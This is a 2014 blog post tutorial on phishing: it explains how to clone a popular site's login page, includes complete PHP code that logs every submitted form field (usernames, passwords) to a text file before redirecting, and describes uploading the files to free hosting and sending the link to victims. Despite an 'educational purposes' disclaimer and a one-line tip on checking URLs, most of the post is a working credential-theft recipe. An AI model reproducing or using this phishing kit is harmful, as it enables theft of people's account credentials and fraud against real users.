Saturday 16 August 2014

How to Do Phishing

 Phishing
Phishing simply means creating a fake page of a popular website or company and stealing personal information like username, password, credit card details, and account numbers etc. with the help of that page. Phishing is one of the simplest techniques used by the hacker to hack the account by stealing the login details. Catching a phishing is quite difficult because it has exactly same home page as the original website but yes the link or URL is different. So if you find any such web page displaying the content of the original website but having other abrupt link then you must report to the admin of the site.

Phishing is illegal to practice so please don’t do it. But yes everyone should know that how does it takes place so that they are never caught in the threats. So let us now learn that how phishing is done and how fake page is created but before we begin let me declare:

DISCLAIMER : I am not responsible for any harm caused by the user. The tutorial is purely and only for educational purposes. Please do not misuse this tutorial. 
 

So it’s a kind request from everyone that please don’t misuse it but try to learn it so that you are not affected by this at any instance. So let’s begin:

Firstly you need to have a hosting account. You can also create a free hosting account that is available on many websites, you can simply google it and create an account in any one of them.

Now what hackers do is that they first select the target website like gmail, facebook etc. Once selected, they create the fake page of that original website.

Creating a fake page is quite simple. Just go to any website say Gmail and then right click and select the option “view source code” and then copy all the code in the notepad and save it as target.html.
Now other step is to create a file named “code.php”. Simply open note pad and copy the following
code:

<?php
header ('Location: http://www.xyz.com');

$handle = fopen("names.txt", "a");

foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

You can replace www.xyz.com with any website you want to direct user to.

Now after copying the following code save it as code.php and now it’s almost done.

Now go to the file target.html and open it because some editing has to be done. Now press ctrl+f and search for “action=” with login written in it. You will observe one link there so replace that link or URL with the file code.php that you have created initially. And now it’s almost done. Also create one file named names.txt where you will get the passwords of the infected user.

Now simply go your hosting account and upload the three files that are: target.html, code.php and name.txt. After they are successfully uploaded it’s ready. Now you will have a link to the fake page like: http://abcxyz.com/target.htm. You can select domain name according to your choice. Now the fake page is ready and now you can submit this link to your friend or anyone else. If he login to this fake page then you can check his username and password in the names.txt file as all the passwords will be stored here.

So this is all about hacking through phishing. But I request you all not to misuse it because it’s illegal and a big cyber-crime. So I hope you will never become the victim of such fake pages. Simply have a look at the link then log in or first reload the page then log in to the account. So in later posts we will also cover some interesting tricks like this so stay connected.

No comments:

Post a Comment

Note: only a member of this blog may post a comment.